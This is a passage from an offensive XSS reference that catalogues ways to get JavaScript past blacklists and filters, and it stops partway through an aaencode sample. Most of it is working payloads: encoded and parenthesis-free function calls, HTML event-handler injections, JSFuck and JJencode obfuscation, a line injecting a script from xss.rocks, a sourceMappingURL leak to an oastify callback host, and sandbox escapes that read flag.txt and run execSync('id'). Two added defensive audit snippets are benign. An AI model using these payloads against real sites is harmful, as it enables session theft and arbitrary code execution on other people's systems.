JavaScript bypass blacklists techniques
Strings
"thisisastring"
'thisisastrig'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
"\h\e\l\l\o"
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))
Special escapes
"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
// Any other char escaped is just itself
Space substitutions inside JS code
<TAB>
/**/
JavaScript comments (from the JavaScript Comments trick)
//This is a 1 line comment
/* This is a multiline comment*/
<!--This is a 1line comment
#!This is a 1 line comment, but "#!" must be at the beginning of the first line
-->This is a 1 line comment, but "-->" must be at the beginning of the first line
JavaScript new lines (from the JavaScript new line trick)
//JavaScript interprets these chars as new lines:
String.fromCharCode(10)
alert("//\nalert(1)") //0x0a
String.fromCharCode(13)
alert("//\ralert(1)") //0x0d
String.fromCharCode(8232)
alert("//\u2028alert(1)") //0xe2 0x80 0xa8
String.fromCharCode(8233)
alert("//\u2029alert(1)") //0xe2 0x80 0xa9
JavaScript whitespaces
// Enumerate every code point the JS parser accepts as whitespace between an
// identifier and its call parentheses
log = [];
function funct() {}
for (let i = 0; i <= 0x10ffff; i++) {
  try {
    eval(`funct${String.fromCodePoint(i)}()`);
    log.push(i);
  } catch (e) {}
}
console.log(log);
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279
//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert(1)>
JavaScript inside a comment
//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send
//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
JavaScript without parentheses
// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name
// Backticks
// Backticks pass the string as an array of length 1
alert`1`
// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`
// To pass several arguments you can use
function btt(){
console.log(arguments);
}
btt`${'arg1'}${'arg2'}${'arg3'}`
//It's possible to construct a function and call it
Function`x${'alert(1337)'}x`
// .replace can use regexes and call a function if something is found
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead
// Using Reflect.apply to call any function with any arguments
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
// Using Reflect.set to call set any value to a variable
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
// valueOf, toString
// These operations are called when the object is used as a primitive
// Because the object is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''
toString=alert;window+''
// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
// optional exception variables inside a catch clause.
try{throw onerror=alert}catch{throw 1}
// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
- https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md
- https://portswigger.net/research/javascript-without-parentheses-using-dommatrix
Arbitrary function (alert) call
//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
[]["constructor"]["constructor"]`$${alert()}```
import('data:text/javascript,alert(1)')
//General function executions
`` //Can be used as parentheses
alert`document.cookie`
alert(document['cookie'])
with(document)alert(cookie)
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
<svg><animate onbegin=alert() attributeName=x></svg>
DOM vulnerabilities
There is JS code that is using unsafely some data controlled by an attacker, like location.href. An attacker could abuse this to execute arbitrary JS code.
Due to the length of the explanation of DOM vulnerabilities, it was moved to this page:
There you will find a detailed explanation of what DOM vulnerabilities are, how they are provoked, and how to exploit them.
Also, don't forget that at the end of the mentioned post you can find an explanation about DOM Clobbering attacks.
Upgrading Self-XSS
Cookie XSS
If you can trigger an XSS by sending the payload inside a cookie, this is usually a self-XSS. However, if you find a subdomain vulnerable to XSS, you could abuse that XSS to inject a cookie for the whole domain, managing to trigger the cookie XSS in the main domain or in other subdomains (the ones vulnerable to cookie XSS). For this you can use the cookie tossing attack:
You can find a great abuse of this technique in this blog post.
Sending your session to the admin
Maybe a user can share their profile with the admin, and if the self XSS is inside the profile of the user and the admin accesses it, they will trigger the vulnerability.
Session Mirroring
If you find some self XSS and the web page has session mirroring for administrators, for example allowing clients to ask for help so that the admin, in order to help you, sees what you are seeing in your session but from their own session.
You could make the administrator trigger your self XSS and steal their cookies/session.
Other Bypasses
Bypassing sanitization via WASM linear-memory template overwrite
When a web app uses Emscripten/WASM, constant strings (like HTML format stubs) live in writable linear memory. A single in‑WASM overflow (e.g., unchecked memcpy in an edit path) can corrupt adjacent structures and redirect writes to those constants. Overwriting a template such as “” turns sanitized input into a JavaScript handler value and yields immediate DOM XSS on render.
Check the dedicated page with exploitation workflow, DevTools memory helpers, and defenses:
Wasm Linear Memory Template Overwrite Xss
Normalised Unicode
You could check whether the reflected values are being unicode normalized on the server (or on the client side) and abuse this functionality to bypass protections. Find an example here.
PHP FILTER_VALIDATE_EMAIL flag Bypass
"><svg/onload=confirm(1)>"@x.y
Ruby-On-Rails bypass
Due to RoR mass assignment, quotes are inserted into the HTML, the quote restriction is bypassed and additional fields (onfocus) can be added inside the tag.
Form example (from this report), if you send the payload:
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
The pair "Key","Value" will be echoed back like this:
{" onfocus=javascript:alert('xss') autofocus a"=>"a"}
Then, the onfocus attribute is inserted and XSS occurs.
Special combinations
<iframe/src="data:text/html,<svg onload=alert(1)>">
<input type=image src onerror="prompt(1)">
<svg onload=alert(1)//
<img src="/" =_=" title="onerror='prompt(1)'">
<img src='1' onerror='alert(0)' <
<script x> alert(1) </script 1=2
<script x>alert('XSS')<script y>
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg////////onload=alert(1)>
<svg id=x;onload=alert(1)>
<svg id=`x`onload=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>
<svg><x><script>alert('1')</x>
<iframe src=""/srcdoc='<svg onload=alert(1)>'>
<svg><animate onbegin=alert() attributeName=x></svg>
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)>
<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
XSS with header injection in a 302 response
If you find that you can inject headers in a 302 Redirect response you could try to make the browser execute arbitrary JavaScript. This is not trivial, as modern browsers do not interpret the HTTP response body if the HTTP response status code is 302, so a cross-site scripting payload alone is useless.
In this report and this one you can read how you can test several protocols inside the Location header and see whether any of them allows the browser to inspect and execute the XSS payload inside the body.
Past known protocols: mailto://, //x:1/, ws://, wss://, empty Location header, resource://.
Only Letters, Numbers and Dots
If you are able to indicate the callback that the javascript is going to execute, limited to those characters, read this section of this post to learn how to abuse this behaviour.
Valid <script> Content-Types to XSS
(From here) If you try to load a script with a content-type such as application/octet-stream, Chrome will throw the following error:
Refused to execute script from ‘https://uploader.c.hc.lc/uploads/xxx’ because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.
The only Content-Types that will allow Chrome to run a loaded script are the ones inside the const kSupportedJavascriptTypes from https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc
const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
};
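Added example (not code from the page or from Chromium): an audit helper that applies the kSupportedJavascriptTypes list above to raw Content-Type header values the way a MIME essence comparison does (parameters dropped, ASCII case-insensitive), so a reviewer can list which responses of an upload or proxy endpoint a `<script src>` would execute. The path/type pairs are constructed sample data.

```javascript
// Added example (not Chromium's or the page's code): audit which Content-Type
// values an endpoint emits would let a <script src> execute in Chrome,
// using the kSupportedJavascriptTypes list quoted above.

const SUPPORTED_JAVASCRIPT_TYPES = new Set([
  "application/ecmascript", "application/javascript",
  "application/x-ecmascript", "application/x-javascript",
  "text/ecmascript", "text/javascript",
  "text/javascript1.0", "text/javascript1.1", "text/javascript1.2",
  "text/javascript1.3", "text/javascript1.4", "text/javascript1.5",
  "text/jscript", "text/livescript",
  "text/x-ecmascript", "text/x-javascript",
]);

// RFC 7230 token characters, used for both type and subtype.
const TOKEN = "[!#$%&'*+.^_`|~0-9a-z-]+";
const ESSENCE_RE = new RegExp(`^${TOKEN}/${TOKEN}$`);

// Reduce a header value to its MIME essence: "Text/JavaScript; charset=utf-8"
// becomes "text/javascript". Returns "" for anything that is not type/subtype.
function mimeEssence(contentType) {
  if (typeof contentType !== "string") return "";
  const essence = contentType.split(";", 1)[0].trim().toLowerCase();
  return ESSENCE_RE.test(essence) ? essence : "";
}

function isExecutableScriptType(contentType) {
  return SUPPORTED_JAVASCRIPT_TYPES.has(mimeEssence(contentType));
}

// Given [path, Content-Type] pairs (e.g. from an upload directory listing or
// a proxy's response log), return the paths that would run as script.
function auditResponseTypes(entries) {
  return entries
    .filter(([, contentType]) => isExecutableScriptType(contentType))
    .map(([path]) => path);
}

// Constructed sample of what an upload endpoint might serve.
const SAMPLE_RESPONSES = [
  ["/uploads/report.bin", "application/octet-stream"],
  ["/uploads/widget.js", "Text/JavaScript; charset=utf-8"],
  ["/uploads/notes.txt", "text/plain"],
  ["/uploads/legacy.js", "text/jscript"],
  ["/uploads/broken", "javascript"],
];
```

Anything that `auditResponseTypes` reports is a response a user-controlled upload path must never be able to produce; the fix on the serving side is to force a non-executable type (and `X-Content-Type-Options: nosniff`) on user content.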
Script Types for XSS
(From here) So, which types can be indicated to load a script?
<script type="???"></script>
- module (default, nothing to explain)
- webbundle: Web Bundles is a feature that allows you to package a bunch of data (HTML, CSS, JS…) together into a .wbn file.
<script type="webbundle">
{
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
}
</script>
The resources are loaded from the source .wbn, not accessed via HTTP
- importmap: Allows improving the import syntax
<script type="importmap">
{
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
}
</script>
<!-- With importmap you can do the following -->
<script>
import moment from "moment"
import { partition } from "lodash"
</script>
This behaviour was used in this writeup to remap a library to eval; abusing it can trigger XSS.
- speculationrules: This feature is mainly meant to solve some problems caused by pre-rendering. It works like this:
<script type="speculationrules">
{
"prerender": [
{ "source": "list", "urls": ["/page/2"], "score": 0.5 },
{
"source": "document",
"if_href_matches": ["https://*.wikipedia.org/**"],
"if_not_selector_matches": [".restricted-section *"],
"score": 0.1
}
]
}
</script>
Web Content-Types for XSS
(From here) The following content types can execute XSS in all browsers:
- text/html
- application/xhtml+xml
- application/xml
- text/xml
- image/svg+xml
- text/plain (?? not in the list but I think I saw this in a CTF)
- application/rss+xml (off)
- application/atom+xml (off)
In other browsers other Content-Types can be used to execute arbitrary JS, check: https://github.com/BlackFan/content-type-research/blob/master/XSS.md
xml Content Type
If the page returns a text/xml content-type it's possible to indicate a namespace and execute arbitrary JS:
<xml>
<text>hello<img src="1" onerror="alert(1)" xmlns="http://www.w3.org/1999/xhtml" /></text>
</xml>
<!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
Special Replacement Patterns
When something like "some {{template}} data".replace("{{template}}", <user_input>) is used, the attacker can use special string replacement patterns to try to bypass some protections: "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))
For example in this writeup, this was used to escape a JSON string inside a script and execute arbitrary code.
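Added example (not code from the page or from the writeup): the page's own payload run through a vulnerable string replacement and through two hardened forms, plus a small check a reviewer can run over values reaching `replace()`. Template and payload are the ones quoted above; the function names are assumptions.

```javascript
// Added example (not the page's code): String.prototype.replace treats "$"
// sequences in a *string* replacement as patterns ($' = text after the match,
// $` = text before it, $& = the match, $1/$<name> = capture groups), so an
// attacker-controlled replacement can pull surrounding page text into itself.
// A replacer *function* returns literal text and no expansion happens.

const TEMPLATE = "123 {{template}} 456"; // template from the page

// Vulnerable: user-controlled value used as a replacement string.
function renderUnsafe(template, userValue) {
  return template.replace("{{template}}", userValue);
}

// Hardened: replacer function, its return value is inserted verbatim.
function renderSafe(template, userValue) {
  return template.replace("{{template}}", () => userValue);
}

// Alternative when a string replacement must stay: neutralise "$" first.
// Inside a replacement string "$$" produces a single literal "$".
function escapeReplacement(s) {
  return s.replace(/\$/g, "$$$$");
}

// Review/detection helper: does a value carry any special replacement sequence?
function hasReplacementPattern(s) {
  return /\$(?:[$&`']|\d|<)/.test(s);
}

// The page's payload: valid JSON that nevertheless contains $' and $`.
const PAYLOAD = JSON.stringify({ name: "$'$`alert(1)//" });

function demo() {
  return {
    unsafe: renderUnsafe(TEMPLATE, PAYLOAD),
    safe: renderSafe(TEMPLATE, PAYLOAD),
    escaped: renderUnsafe(TEMPLATE, escapeReplacement(PAYLOAD)),
    flagged: hasReplacementPattern(PAYLOAD),
  };
}
```

`String.prototype.replaceAll` expands the same patterns, so the replacer-function form is the right default for both; `JSON.stringify` on its own gives no protection, since `$` needs no JSON escaping.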
Chrome Cache to XSS
XS Jails Escape
If you only have a limited set of characters to use, check these other valid solutions for XSJail problems:
// eval + unescape + regex
eval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))
// use of with
with(console)log(123)
with(/console.log(1)/index.html)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))
with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))
with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))
with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
//Final solution
with(
/with(String)
with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)
with(mainModule)
with(require(k))
return(String(readFileSync(n)))
/)
with(this)
with(constructor)
constructor(source)()
// For more uses of with go to challenge misc/CaaSio PSE in
// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
If everything is undefined before executing untrusted code (like in this writeup) it's possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code:
- Using import()
// although import "fs" doesn’t work, import('fs') does.
import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8")))
- Accessing require indirectly
According to this, modules are wrapped by Node.js inside a function, like this:
;(function (exports, require, module, __filename, __dirname) {
// our actual module code
})
Therefore, if from that module we can call another function, it's possible to use arguments.callee.caller.arguments[1] from that function to access require:
;(function () {
return arguments.callee.caller.arguments[1]("fs").readFileSync(
"/flag.txt",
"utf8"
)
})()
In a similar way to the previous example, it's possible to use error handlers to access the wrapper of the module and get the require function:
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = "".constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) =>
structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arguments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log("=".repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req("child_process").execSync("id").toString())
}
}
}
trigger()
Obfuscation & Advanced Bypass
- Different obfuscations in one page: https://aem1k.com/aurebesh.js/
- https://github.com/aemkei/katakana.js
- https://javascriptobfuscator.herokuapp.com/
- https://skalman.github.io/UglifyJS-online/
- http://www.jsfuck.com/
- More sophisticated JSFuck: https://medium.com/@Master_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce
- http://utf-8.jp/public/jjencode.html
- https://utf-8.jp/public/aaencode.html
- https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses
//Katana
<script>
([,ウ,,,,ア]=[]+{}
,[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
</script>
//JJencode
<script>$=~[];$={___:++$,$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$:({}+"")[$],$_$:($[$]+"")[$],_$:++$,$_:(!""+"")[$],$__:++$,$_$:++$,$__:({}+"")[$],$_:++$,$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$=($.$+"")[$.__$])+((!$)+"")[$._$]+($.__=$.$_[$.$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$=$.$+(!""+"")[$._$]+$.__+$._+$.$+$.$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$+"\""+$.$_$_+(![]+"")[$._$_]+$.$_+"\\"+$.__$+$.$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
//JSFuck
<script>
(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]
+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()
</script>
//aaencode
゚ω゚ノ = /`m´)ノ ~┻━┻ / /*´∇`*/["_"]
o = ゚ー゚ = _ = 3
c = ゚Θ゚ = ゚ー゚ - ゚ー゚
゚Д゚ = ゚Θ゚ = (o ^ _ ^ o) / (o ^ _ ^ o)
゚Д゚ = {
゚Θ゚: "_",
゚ω゚ノ: ((゚ω゚ノ == 3) + "_")[゚Θ゚],
゚ー゚ノ: (゚ω゚ノ + "_")[o ^ _ ^ (o - ゚Θ゚)],
゚Д゚ノ: ((゚ー゚ == 3) + "_")[゚ー゚],
}
゚Д゚[゚Θ゚] = ((゚ω゚ノ == 3) + "_")[c ^ _ ^ o]
゚Д゚["c"] = (゚Д゚ + "_")[゚ー゚ + ゚ー゚ - ゚Θ゚]
゚Д゚["o"] = (゚Д゚ + "_")[゚Θ゚]
゚o゚ =
゚Д゚["c"] +
゚Д゚["o"] +
(゚ω゚ノ + "_")[゚Θ゚] +
((゚ω゚ノ == 3) + "_")[゚ー゚] +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
((゚ー゚ == 3) + "_")[゚Θ゚] +
((゚ー゚ == 3) + "_")[゚ー゚ - ゚Θ゚] +
゚Д゚["c"] +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
゚Д゚["o"] +
((゚ー゚ == 3) + "_")[゚Θ゚]
゚Д゚["_"] = (o ^ _ ^ o)[゚o゚][゚o゚]
゚ε゚ =
((゚ー゚ == 3) + "_")[゚Θ゚] +
゚Д゚.゚Д゚ノ +
(゚Д゚ + "_")[゚ー゚ + ゚ー゚] +
((゚ー゚ == 3) + "_")[o ^ _ ^ (o - ゚Θ゚)] +
((゚ー゚ == 3) + "_")[゚Θ゚] +
(゚ω゚ノ + "_")[゚Θ゚]
゚ー゚ += ゚Θ゚
゚Д゚[゚ε゚] = "\\"
゚Д゚.゚Θ゚ノ = (゚Д゚ + ゚ー゚)[o ^ _ ^ (o - ゚Θ゚)]
o゚ー゚o = (゚ω゚ノ + "_")[c ^ _ ^ o]
゚Д゚[゚o゚] = '"'
゚Д゚["_"](
゚Д゚["_"](
゚ε゚ +
゚Д゚[゚o゚] +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
゚Θ゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
(゚ー゚ + ゚Θ゚) +
゚ー゚ +
゚Д゚[゚ε゚] +
゚Θ゚ +
゚ー゚ +
(゚ー゚ + ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
((o ^ _ ^ o) - ゚Θ゚) +
゚Д゚[゚ε゚] +
゚Θ゚ +
((o ^ _ ^ o) + (o ^ _ ^ o)) +
゚ー゚ +
